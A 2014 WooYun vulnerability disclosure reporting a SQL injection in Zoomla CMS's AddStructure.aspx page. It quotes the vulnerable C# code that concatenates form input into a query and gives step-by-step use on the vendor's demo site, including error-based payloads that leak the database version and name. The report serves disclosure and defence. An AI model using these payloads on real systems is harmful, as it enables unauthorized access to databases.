当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-071161

漏洞标题:逐浪CMS某处SQL注入一枚

相关厂商:逐浪CMS

漏洞作者: 路人甲

提交时间:2014-08-06 15:46

修复时间:2014-11-01 15:48

公开时间:2014-11-01 15:48

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:5

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-08-06: 细节已通知厂商并且等待厂商处理中
2014-08-11: 厂商主动忽略漏洞,细节向第三方安全合作伙伴开放
2014-10-05: 细节向核心白帽子及相关领域专家公开
2014-10-15: 细节向普通白帽子公开
2014-10-25: 细节向实习白帽子公开
2014-11-01: 细节向公众公开

简要描述:

逐浪最新版 注入一枚

详细说明:

最新版默认是可以注册用户的

http://demo.zoomla.cn/User/login.aspx


注册用户
我这里用的是

test123

111111


登录
然后访问

demo.zoomla.cn/User/UserZone/AddStructure.aspx


主要代码是

protected void Button1_Click(object sender, EventArgs e)
{
if (base.Request.QueryString["ID"] != null)
{
int iD = DataConverter.CLng(base.Request.QueryString["ID"]);
this.model = this.bll.Select(iD);
this.model.Name = base.Request.Form["Name"];
this.bll.Update(this.model);
function.JsAlert("修改成功!", "Structure.aspx");
}
else if ((this.TxtProjectName.Text.Trim() != null) && (this.TxtProjectName.Text.Trim() != "")) //看这里
{
if (this.bll.Sel("Name='" + this.TxtProjectName.Text.Trim() + "'", "").Rows.Count > 0) 输入框没处理 存在注入
{
this.LblMessage.Text = "<font color=red>此结构名已存在,请重新输入!</font>";
}
else
{
this.model.ParentID = 0;
if (base.Request.QueryString["pid"] != null)
{
this.model.ParentID = DataConverter.CLng(base.Request.QueryString["pid"]);
}
this.model.Opens = 1;
this.model.Status = 0x63;
if (!string.IsNullOrEmpty(base.Request["Group"]))
{
this.model.Group = DataConverter.CLng(base.Request.QueryString["Group"]);
}
else
{
this.model.Group = 1;
}
this.model.Name = this.TxtProjectName.Text.Trim();
this.model.AddTime = DateTime.Now;
this.model.UserID = this.buser.GetLogin().UserID;
int num2 = this.bll.Insert(this.model);
if (num2 > 0)
{
M_UserInfo userInfo = this.buser.SeachByID(this.buser.GetLogin().UserID);
userInfo.StructureID = userInfo.StructureID + num2;
this.buser.UpDateUser(userInfo);
base.Response.Write("<script>alert('添加成功!!!');location.href='Structure.aspx';</script>");
}
this.LblMessage.Text = "";
}
}
else
{
this.LblMessage.Text = "<font color=red>请输入项目类型名称</font>";
}
}


访问

demo.zoomla.cn/User/UserZone/AddStructure.aspx


输入框输入

1' and (select @@version)>0--


点击提交

61.png


62.png


输入框输入的

1' and (select db_name() )>0--


63.png


漏洞证明:

1.jpg

修复方案:

对输入框进行处理

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2014-11-01 15:48

厂商回复:

最新状态:

暂无